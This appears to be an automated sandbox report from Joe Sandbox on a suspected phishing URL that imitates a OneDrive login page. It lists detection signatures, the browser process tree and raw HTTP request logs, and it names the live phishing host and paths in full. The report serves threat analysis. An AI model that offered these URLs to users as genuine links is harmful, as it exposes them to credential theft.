Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/

Overview

General Information

Sample URL:https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/
Analysis ID:1380391
Infos:

Detection

Score:22
Range:0 - 100
Whitelisted:false
Confidence:80%

Signatures

Phishing site detected (based on logo match)
Creates files inside the system directory
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Submit button contains javascript call

Classification

  • System is w10x64
  • chrome.exe (PID: 4024 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 2104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2272,i,569364735770316750,3485990403573813858,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 4592 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/ MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEMatcher: Template: onedrive matched
Source: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEHTTP Parser: Number of links: 0
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normalHTTP Parser: Base64 decoded: http://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normal
Source: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEHTTP Parser: Title: Aftm7tOpng does not match URL
Source: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEHTTP Parser: On click: nQ(true)
Source: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEHTTP Parser: <input type="password" .../> found
Source: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normalHTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normalHTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normalHTTP Parser: No favicon
Source: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEHTTP Parser: No favicon
Source: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEHTTP Parser: No <meta name="author".. found
Source: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 20.25.241.18:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.31.50.93:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.31.50.93:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.25.241.18:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.25.241.18:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.25.241.18:443 -> 192.168.2.6:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.159.126.152:443 -> 192.168.2.6:49778 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.159.126.152:443 -> 192.168.2.6:49781 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 184.31.50.93
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknownTCP traffic detected without corresponding DNS query: 20.25.241.18
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.134&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.134Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Ad89NLTS/ HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.0.2/dist/css/bootstrap.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/ea25f566/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=84a8fe9b2b47507e HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/655695331:1706105503:NvTe9F65H4Ha20SvtcR2YZxrWN67aApM_5bJtlGEiLs/84a8fe9b2b47507e/2f47f656679f8e4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/84a8fe9b2b47507e/1706106840301/fdc164c912d01ac111ebb61588bbd64cfefffb90b726ec87368a6336ce872d90/dpaCGNz7ndiTzaL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/84a8fe9b2b47507e/1706106840303/7tvwTEIxaRkEWV- HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/84a8fe9b2b47507e/1706106840303/7tvwTEIxaRkEWV- HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/655695331:1706105503:NvTe9F65H4Ha20SvtcR2YZxrWN67aApM_5bJtlGEiLs/84a8fe9b2b47507e/2f47f656679f8e4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/655695331:1706105503:NvTe9F65H4Ha20SvtcR2YZxrWN67aApM_5bJtlGEiLs/84a8fe9b2b47507e/2f47f656679f8e4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /Ad89NLTS/ HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /0YnPUEkvNYKUHRxh HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /1zVUXHxamXrpmXhlHPnZeBElLS/ HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPE HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/0eWLTvWEPE HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/6Jv3UEQZN3wq33YY/1sorWiW94sLFre7 HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/6UzTmEVCN/7V7eH0UOOchUDO2 HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/6AmLV3UL1pt/8ufkTIk4Df HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
Source: global trafficHTTP traffic detected: GET /VDgyaQMqDddyxrJrBbYdMwrE/6zszKQogk5hPX/5ksp3DD5a7cAYqnU HTTP/1.1Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.suConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
